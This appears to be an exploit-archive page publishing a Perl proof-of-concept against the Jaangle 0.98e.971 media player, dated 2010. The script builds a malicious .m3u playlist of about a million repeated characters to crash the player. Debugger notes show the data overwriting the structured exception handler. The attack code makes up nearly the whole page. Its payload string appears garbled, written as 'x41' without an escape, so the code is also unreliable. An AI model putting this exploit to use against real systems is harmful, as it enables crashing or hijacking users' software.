[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Jaangle 0.98e.971 Denial of Service Vulnerability
# Published : 2010-08-02
# Author : hadji samir
# Previous Title : Xmyplay 3.5.1 Denial of Service Vulnerability
# Next Title : Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption
#!/usr/bin/perl
# jaangle 0.98e.971
# Author: s-dz , s-dz@hotmail.fr
# Download : http://www.jaangle.com/files/jsetup.exe
# Tested : Windows XP SP2 (fr)
# DATE : 2010-08-02
#
# thanks TCT , DGM8
#
# EDB Notes:
# 0012B448 00410041 A.A. jaangle.00410041
# 0012B44C 00410041 A.A. Pointer to next SEH record
# 0012B450 00410041 A.A. SE handler
# 0012B454 00410041 A.A. jaangle.00410041
my $file= "mahboul-3lik00.m3u";
my $junk= "x41" x 1000000;
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");